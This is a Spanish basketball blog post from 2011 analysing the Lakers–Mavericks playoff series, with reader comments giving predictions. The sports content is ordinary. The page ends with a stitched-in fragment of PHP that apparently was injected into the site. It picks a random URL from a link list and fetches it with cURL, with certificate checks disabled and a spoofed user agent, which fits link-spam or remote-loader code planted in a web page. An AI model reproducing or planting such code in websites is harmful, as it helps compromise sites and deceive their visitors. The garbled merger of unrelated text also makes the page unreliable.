Análisis Los Angeles Lakers vs Dallas Mavericks

02 de May de 2011 por Viva_Dirk

Regular: 2-1 para Lakers

Lakers: 101.5 PF – 95.4 PC
Mavericks: 100.2 PF – 96 PC

Sendos equipos llegan tras un 4-2 que han dejado sensaciones muy distintas en cada afición. Los angelinos han visto la peor serie de playoffs de Pau Gasol y a un Kobe renqueante físicamente, dejando paso al mejor Bynum que haya pisado la postemporada. En los Mavs todos han cumplido su papel. Han ofrecido un buen nivel frente a un rival duro como Portland pero saben por experiencia que eso no es suficiente. Ahora les toca ganar a un coco, vencer en cada pequeño detalle y saber adaptarse. Un duelo que lo tiene todo.

Claves de la eliminatoria

– Kobe sin oposición: El líder de los Lakers ha hecho una primera ronda discreta. Es habitual para él jugar con molestias y esperamos que esto no sea decisivo en su rendimiento. Los Mavs no disponen de ningun jugador capaz de disminuir las capacidades de Bryant y a la vez no condicionar demasiado el resto del juego. Shawn Marion podría ocuparse de su defensa pero eso supondría demasiada ventaja para cualquiera de los aleros de los Lakers respecto a Jason Terry. Además el tipo de defensa que Marion puede practicar sobre Kobe no suele tener efectos durante demasiados minutos. Si el nivel de Bryant es el máximo los Mavs estan vendidos, algo por lo que apostaría una buena cifra de dinero y que creo que marcará por completo la eliminatoria.

– Duelo europeo & duelo de centers: Pau Gasol contra Dirk Nowitzki, para muchos slos 2 mejores jugadores europeos de la historia. El español viene de una serie lamentable frente a los Hornets y la exigencia va a ser máxima en este cruce. En defensa va a sufrir para defender a Nowitzki lejos de la canasta y en ataque seguramente se verá mucho las caras con Tyson Chandler que ha demostrado varias veces tener cogida la medida a Pau. Aun así su aportación se antoja absolutamente decisiva tanto en el aspecto más individual como, sobretodo, en la ejecución del triangulo para mover el balón. Por su parte Nowitzki tiene que hacer sufrir a Gasol en defensa y minimizar sus carencias defensivas a base de agresividad. Posiblemente le veamos emparejado con Bynum muchos minutos y ante un jugador tan interior pueden notarse menos sus defectos. El duelo bajo los aros entre Chandler y Bynum marcará el ritmo de los partidos, ya que Kidd funciona mucho mejor cuando el aro de los Mavs se cierra con eficacia y Bynum viene de coger 4 rebotes ofensivos por noche frente a los Hornets.

– Sextos hombres: Lamar Odom y Jason Terry son dos seguros de vida en el banco. Ambos han hecho bien su trabajo en primera ronda y son un arma clave para cambiar dinámicas negativas en sus equipos. No creo que vaya a ser una serie fácil para ningunoya que se encontrarán  con defensas que se ajustan bastante a ellos. Shawn Marion y Shannon Brown lo tienen todo para hacerles la vida imposible.

– Modo Playoffs: Ahí Phil Jackson es uno de los mejores técnicos que han pisado la liga. Sus variaciones y adaptaciones ante cada suceso han sido claves muchas veces, dispone de un equipo que conoce sus sistemas al dedillo y tiene en Kobe&Fisher dos extensiones en la cancha. Carlisle por su parte es catalogado como un técnico de regular season. Ha movido sus piezas a la perfección para llegar a este punto con todos en su máximo rendimiento. Lo ha hecho muy bien pero ahora toca salirse del guión cuando haga falta…Veremos si es capaz de hacerlo.

– Intendencia: Fisher puede respirar tranquilo ahora que Chris Paul no va a estar delante suyo cada noche. Kidd tiene muchas virtudes pero ninguna de ellas le hace especial daño al capitán de los Lakers que se encontrará con mayores problemas cuando coincida en pista con Barea. Esta vez Ron Artest no tiene alguien a quien frenar así que podemos ver sus minutos disminuidos y su rendimiento desligado del devenir de la eliminatoria.

Pronóstico: 4-1 Lakers

Comenta

9 comentarios a esta entrada

  1. ralage dice:
    #1

    Fácil ver un 4-1, 4-2 para Lakers
    Algunos factores q podrían alargar la serie serían:
    La relajación de LAL,
    que Kidd este acertado, especialmente en el tiro,
    Que a los Lakers se les atragante la defensa zonal que usan en ocasiones los Mavs, y que por ejemplo le dio buenos resultados el año pasado a los Suns

    Por cierto parece increíble que 2 equipos con tan buenas trayectorias no se hayan enfrentado en PO desde el 88

      Citar

  2. miquel dice:
    #2

    4-1 para lakers sino se relajan si se relajan un 4-2 y veo muy dificil un septimo partido

      Citar

  3. Javijaen dice:
    #3

    Nadie da un duro por Mavs, y es que tenemos la mosca detrás de la oreja con LAL, aunque hoy en el primer partido veremos si están mal de verdad o es que el “entrenamiento” de primera ronda ya ha acabado. 4-1 también para Lakers.

      Citar

  4. Tobal dice:
    #4

    Todo el mundo da favoritos a Lakers,aunque ojo con el primer partido.que suele ser clave en play offs,porque como a Dallas,le dé por ganar en cancha de los Lakers,la cosa puede cambiar mucho.El duelo entre Nowitzki y Gasol,creo que será decisivo,yo voy arriesgarme y apuesto por un 3 – 4 para los Mavericks,espero y deseo que esto sea así,ya nos lo merecemos los aficionados de Dallas

      Citar

  5. Txusma dice:
    #5

    Un 3-4 para Mavs significa que ganan el séptimo en el Staples lo que me parece prácticamente imposible. Sería apoteósico…

    4-2 Lakers si ganan el primer partido. Si no 2-4 Mavs. Ya ves lo importante que es.

      Citar

  6. Denise dice:
    #6

    Con Beaubois y Caron Butler no le daría favorito claro a nadie, pero sin éstos dos, apuesto por un 4-2 para Lakers con los Mavericks ganando el primer partido (el de esta noche). Marion defendiendo a Kobe?? Sería un suicidio….

      Citar

  7. Denise dice:
    #7

    Y acerté pronosticando la victoria de Mavs ante L.A. ..Si es que es importantisima la ventaja que te da jugar en tu cancha….XD.

      Citar

  8. Sr. Lagarto dice:
    #8

    Pues casi todo el mundo pronosticando un 4-2 fácil para LA y la primera en la frente. Espero que el 1 de los pronosticos ya se haya hecho con el partido de esta noche y pueda pasar LA. Nada me gustaría más que una final en el W con Ositos-LA.

    Saludos.

      Citar

  9. GreenPride dice:
    #9

    Bueno pues eliminatoria en principio favorable a los Lakers sobre todo por las bajas de Butler y Beaubois y la ventaja de campo laker, así como por la sospecha de los Mavs en los playoffs. Sin embargo a las primeras de cambio los Lakers van y se dejan la ventaja campo en un partido que tenían muy de cara y la eliminatoria se pone interesantísima. Yo creo que será una eliminatoria larga y mi pronóstico es 4-3 Lakers (antes del primero hubiera sido 4-2 Lakers). Por los Lakers será clave que Kobe domine y que Pau tenga una serie mejor que la primera tanto en defensa como en ataque para hacer sufrir a Dirk. Bynum no será tan decisivo pues Chandler y Haywood opondrán bastante más resistencia, al igual que Artest, sin alero dominante al que defender. Los Lakers tendrán que defender bien el perímetro (Kidd, Stojakovic y sobre todo Terry) y tener cuidado con el juego rápido de los Mavs.
    Por cierto Denise, a lo largo de su carrera Marion ha defendido mucho a Kobe sobre todo cuando estaba en Phoenix y no lo ha hecho nada mal. En este primer partido lo defendió también a ratos y tampoco lo hizo mal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>